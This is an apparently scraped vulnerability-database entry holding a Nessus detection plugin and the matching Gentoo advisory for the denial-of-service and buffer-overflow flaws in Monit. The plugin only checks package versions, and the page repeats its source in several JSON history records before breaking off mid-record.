GLSA-200403-14 : Multiple Security Vulnerabilities in Monit
2004-08-30T00:00:00
ID GENTOO_GLSA-200403-14.NASL Type nessus Reporter Tenable Modified 2015-04-13T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-200403-14 (Multiple Security Vulnerabilities in Monit)
A denial of service may occur due to Monit not sanitizing remotely supplied HTTP parameters before passing them to memory allocation functions. This could allow an attacker to cause an unexpected condition that could lead to the Monit daemon crashing.
An overly long http request method may cause a buffer overflow due to Monit performing insufficient bounds checking when handling HTTP requests.
Impact :
An attacker may crash the Monit daemon to create a denial of service condition or cause a buffer overflow that would allow arbitrary code to be executed with root privileges.
Workaround :
A workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200403-14.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include("compat.inc");
if (description)
{
script_id(14465);
script_version("$Revision: 1.11 $");
script_cvs_date("$Date: 2015/04/13 13:34:21 $");
script_cve_id("CVE-2003-1083", "CVE-2003-1084");
script_bugtraq_id(9098, 9099);
script_xref(name:"GLSA", value:"200403-14");
script_name(english:"GLSA-200403-14 : Multiple Security Vulnerabilities in Monit");
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-200403-14
(Multiple Security Vulnerabilities in Monit)
A denial of service may occur due to Monit not sanitizing remotely
supplied HTTP parameters before passing them to memory allocation
functions. This could allow an attacker to cause an unexpected
condition that could lead to the Monit daemon crashing.
An overly long http request method may cause a buffer overflow due to
Monit performing insufficient bounds checking when handling HTTP
requests.
Impact :
An attacker may crash the Monit daemon to create a denial of service
condition or cause a buffer overflow that would allow arbitrary code to
be executed with root privileges.
Workaround :
A workaround is not currently known for this issue. All users are
advised to upgrade to the latest version of the affected package."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/200403-14"
);
script_set_attribute(
attribute:"solution",
value:
"Monit users should upgrade to version 4.2 or later:
# emerge sync
# emerge -pv '>=app-admin/monit-4.2'
# emerge '>=app-admin/monit-4.2'"
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:monit");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2004/03/31");
script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/30");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2004-2015 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (qpkg_check(package:"app-admin/monit", unaffected:make_list("ge 4.2"), vulnerable:make_list("le 4.1"))) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = qpkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "app-admin/monit");
}
{"id": "GENTOO_GLSA-200403-14.NASL", "bulletinFamily": "scanner", "title": "GLSA-200403-14 : Multiple Security Vulnerabilities in Monit", "description": "The remote host is affected by the vulnerability described in GLSA-200403-14 (Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely supplied HTTP parameters before passing them to memory allocation functions. This could allow an attacker to cause an unexpected condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to Monit performing insufficient bounds checking when handling HTTP requests.\n Impact :\n\n An attacker may crash the Monit daemon to create a denial of service condition or cause a buffer overflow that would allow arbitrary code to be executed with root privileges.\n Workaround :\n\n A workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package.", "published": "2004-08-30T00:00:00", "modified": "2015-04-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=14465", "reporter": "Tenable", "references": ["https://security.gentoo.org/glsa/200403-14"], "cvelist": ["CVE-2003-1083", "CVE-2003-1084"], "type": "nessus", "lastseen": "2018-09-01T23:39:53", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2003-1083", "CVE-2003-1084"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200403-14 (Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely supplied HTTP parameters before passing them to memory allocation functions. This could allow an attacker to cause an unexpected condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to Monit performing insufficient bounds checking when handling HTTP requests.\n Impact :\n\n An attacker may crash the Monit daemon to create a denial of service condition or cause a buffer overflow that would allow arbitrary code to be executed with root privileges.\n Workaround :\n\n A workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package.", "edition": 1, "enchantments": {}, "hash": "4728ded111dc500cf2acbafcfaca71fd6d35f66d7b474ec745e65ef5aec74241", "hashmap": [{"hash": "a6dbdd731f8003ff606f80d72c4beadc", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "823dc304f8748ae74f374caef0171567", "key": "title"}, {"hash": "8968b50a9192002f53523c09c60104ba", "key": "href"}, {"hash": "cd797747be6b7c0b1e5376ec164ffdc5", "key": "description"}, {"hash": "e86c39706a2a5033ed14f935353f015e", "key": "pluginID"}, {"hash": "326af443ca0c41e91daa171ff124ce60", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4690baa87230085eab45e45fdf72cb18", "key": "sourceData"}, {"hash": "24187a71903ffb0574f64d82266ba67c", "key": "cvelist"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "6ee761184a4ca30c3790b5abeaf8061b", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=14465", "id": "GENTOO_GLSA-200403-14.NASL", "lastseen": "2016-09-26T17:23:57", "modified": "2015-04-13T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.2", "pluginID": "14465", "published": "2004-08-30T00:00:00", "references": ["https://security.gentoo.org/glsa/200403-14"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14465);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:34:21 $\");\n\n script_cve_id(\"CVE-2003-1083\", \"CVE-2003-1084\");\n script_bugtraq_id(9098, 9099);\n script_xref(name:\"GLSA\", value:\"200403-14\");\n\n script_name(english:\"GLSA-200403-14 : Multiple Security Vulnerabilities in Monit\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-14\n(Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely\n supplied HTTP parameters before passing them to memory allocation\n functions. This could allow an attacker to cause an unexpected\n condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to\n Monit performing insufficient bounds checking when handling HTTP\n requests.\n \nImpact :\n\n An attacker may crash the Monit daemon to create a denial of service\n condition or cause a buffer overflow that would allow arbitrary code to\n be executed with root privileges.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Monit users should upgrade to version 4.2 or later:\n # emerge sync\n # emerge -pv '>=app-admin/monit-4.2'\n # emerge '>=app-admin/monit-4.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:monit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/monit\", unaffected:make_list(\"ge 4.2\"), vulnerable:make_list(\"le 4.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"app-admin/monit\");\n}\n", "title": "GLSA-200403-14 : Multiple Security Vulnerabilities in Monit", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:57"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:monit", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2003-1083", "CVE-2003-1084"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is affected by the vulnerability described in GLSA-200403-14 (Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely supplied HTTP parameters before passing them to memory allocation functions. This could allow an attacker to cause an unexpected condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to Monit performing insufficient bounds checking when handling HTTP requests.\n Impact :\n\n An attacker may crash the Monit daemon to create a denial of service condition or cause a buffer overflow that would allow arbitrary code to be executed with root privileges.\n Workaround :\n\n A workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package.", "edition": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "ac681de8ceb114edad5c6d1a901c6a17115ec730e3ddb03c6e2cc981072e374e", "hashmap": [{"hash": "a6dbdd731f8003ff606f80d72c4beadc", "key": "references"}, {"hash": "4101951b7bafbcde278b39c97cffaf4d", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "823dc304f8748ae74f374caef0171567", "key": "title"}, {"hash": "8968b50a9192002f53523c09c60104ba", "key": "href"}, {"hash": "cd797747be6b7c0b1e5376ec164ffdc5", "key": "description"}, {"hash": "e86c39706a2a5033ed14f935353f015e", "key": "pluginID"}, {"hash": "326af443ca0c41e91daa171ff124ce60", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4690baa87230085eab45e45fdf72cb18", "key": "sourceData"}, {"hash": "24187a71903ffb0574f64d82266ba67c", "key": "cvelist"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "6ee761184a4ca30c3790b5abeaf8061b", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=14465", "id": "GENTOO_GLSA-200403-14.NASL", "lastseen": "2018-08-30T19:35:29", "modified": "2015-04-13T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "14465", "published": "2004-08-30T00:00:00", "references": ["https://security.gentoo.org/glsa/200403-14"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14465);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:34:21 $\");\n\n script_cve_id(\"CVE-2003-1083\", \"CVE-2003-1084\");\n script_bugtraq_id(9098, 9099);\n script_xref(name:\"GLSA\", value:\"200403-14\");\n\n script_name(english:\"GLSA-200403-14 : Multiple Security Vulnerabilities in Monit\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-14\n(Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely\n supplied HTTP parameters before passing them to memory allocation\n functions. This could allow an attacker to cause an unexpected\n condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to\n Monit performing insufficient bounds checking when handling HTTP\n requests.\n \nImpact :\n\n An attacker may crash the Monit daemon to create a denial of service\n condition or cause a buffer overflow that would allow arbitrary code to\n be executed with root privileges.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Monit users should upgrade to version 4.2 or later:\n # emerge sync\n # emerge -pv '>=app-admin/monit-4.2'\n # emerge '>=app-admin/monit-4.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:monit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/monit\", unaffected:make_list(\"ge 4.2\"), vulnerable:make_list(\"le 4.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"app-admin/monit\");\n}\n", "title": "GLSA-200403-14 : Multiple Security Vulnerabilities in Monit", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:35:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:monit", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2003-1083", "CVE-2003-1084"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200403-14 (Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely supplied HTTP parameters before passing them to memory allocation functions. This could allow an attacker to cause an unexpected condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to Monit performing insufficient bounds checking when handling HTTP requests.\n Impact :\n\n An attacker may crash the Monit daemon to create a denial of service condition or cause a buffer overflow that would allow arbitrary code to be executed with root privileges.\n Workaround :\n\n A workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package.", "edition": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "05a3f74ed2ab26d5012a5243305a4e8cbe34f0f74eaabbcd47c869352a0c0cdb", "hashmap": [{"hash": "a6dbdd731f8003ff606f80d72c4beadc", "key": "references"}, {"hash": "4101951b7bafbcde278b39c97cffaf4d", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "823dc304f8748ae74f374caef0171567", "key": "title"}, {"hash": "8968b50a9192002f53523c09c60104ba", "key": "href"}, {"hash": "cd797747be6b7c0b1e5376ec164ffdc5", "key": "description"}, {"hash": "e86c39706a2a5033ed14f935353f015e", "key": "pluginID"}, {"hash": "326af443ca0c41e91daa171ff124ce60", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4690baa87230085eab45e45fdf72cb18", "key": "sourceData"}, {"hash": "24187a71903ffb0574f64d82266ba67c", "key": "cvelist"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "6ee761184a4ca30c3790b5abeaf8061b", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=14465", "id": "GENTOO_GLSA-200403-14.NASL", "lastseen": "2017-10-29T13:35:59", "modified": "2015-04-13T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "14465", "published": "2004-08-30T00:00:00", "references": ["https://security.gentoo.org/glsa/200403-14"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14465);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:34:21 $\");\n\n script_cve_id(\"CVE-2003-1083\", \"CVE-2003-1084\");\n script_bugtraq_id(9098, 9099);\n script_xref(name:\"GLSA\", value:\"200403-14\");\n\n script_name(english:\"GLSA-200403-14 : Multiple Security Vulnerabilities in Monit\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-14\n(Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely\n supplied HTTP parameters before passing them to memory allocation\n functions. This could allow an attacker to cause an unexpected\n condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to\n Monit performing insufficient bounds checking when handling HTTP\n requests.\n \nImpact :\n\n An attacker may crash the Monit daemon to create a denial of service\n condition or cause a buffer overflow that would allow arbitrary code to\n be executed with root privileges.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Monit users should upgrade to version 4.2 or later:\n # emerge sync\n # emerge -pv '>=app-admin/monit-4.2'\n # emerge '>=app-admin/monit-4.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:monit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/monit\", unaffected:make_list(\"ge 4.2\"), vulnerable:make_list(\"le 4.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"app-admin/monit\");\n}\n", "title": "GLSA-200403-14 : Multiple Security Vulnerabilities in Monit", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:35:59"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "4101951b7bafbcde278b39c97cffaf4d"}, {"key": "cvelist", "hash": "24187a71903ffb0574f64d82266ba67c"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "cd797747be6b7c0b1e5376ec164ffdc5"}, {"key": "href", "hash": "8968b50a9192002f53523c09c60104ba"}, {"key": "modified", "hash": "326af443ca0c41e91daa171ff124ce60"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": "e86c39706a2a5033ed14f935353f015e"}, {"key": "published", "hash": "6ee761184a4ca30c3790b5abeaf8061b"}, {"key": "references", "hash": "a6dbdd731f8003ff606f80d72c4beadc"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "4690baa87230085eab45e45fdf72cb18"}, {"key": "title", "hash": "823dc304f8748ae74f374caef0171567"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "05a3f74ed2ab26d5012a5243305a4e8cbe34f0f74eaabbcd47c869352a0c0cdb", "viewCount": 0, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14465);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:34:21 $\");\n\n script_cve_id(\"CVE-2003-1083\", \"CVE-2003-1084\");\n script_bugtraq_id(9098, 9099);\n script_xref(name:\"GLSA\", value:\"200403-14\");\n\n script_name(english:\"GLSA-200403-14 : Multiple Security Vulnerabilities in Monit\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-14\n(Multiple Security Vulnerabilities in Monit)\n\n A denial of service may occur due to Monit not sanitizing remotely\n supplied HTTP parameters before passing them to memory allocation\n functions. This could allow an attacker to cause an unexpected\n condition that could lead to the Monit daemon crashing.\n An overly long http request method may cause a buffer overflow due to\n Monit performing insufficient bounds checking when handling HTTP\n requests.\n \nImpact :\n\n An attacker may crash the Monit daemon to create a denial of service\n condition or cause a buffer overflow that would allow arbitrary code to\n be executed with root privileges.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Monit users should upgrade to version 4.2 or later:\n # emerge sync\n # emerge -pv '>=app-admin/monit-4.2'\n # emerge '>=app-admin/monit-4.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:monit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 